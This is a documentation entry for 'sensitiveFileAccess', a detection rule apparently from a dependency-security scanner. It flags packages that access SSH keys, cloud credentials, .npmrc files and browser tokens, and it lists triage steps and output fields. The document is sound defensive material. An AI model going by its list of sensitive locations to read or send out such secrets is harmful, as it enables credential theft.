sensitiveFileAccess

Flags code that reads/writes sensitive file paths (for example SSH keys, cloud credentials, .npmrc, browser tokens).

Implemented in: src/lib/detection/plugins/sensitive-file-access.ts
Enabled by default: yes

What it means

The package contains filesystem access patterns targeting well-known sensitive locations.

Why it matters

Stealing local secrets is one of the highest-impact outcomes of dependency compromise.

What to do

• Identify exactly which paths are being accessed and under what conditions.
• Look for subsequent network sends or archive/encryption steps.
• Treat unexpected access as critical when combined with networkAccess / c2Communication.

Common fields

• filePath, lineStart/lineEnd, codeSnippet
• metadata may include the matched path pattern(s)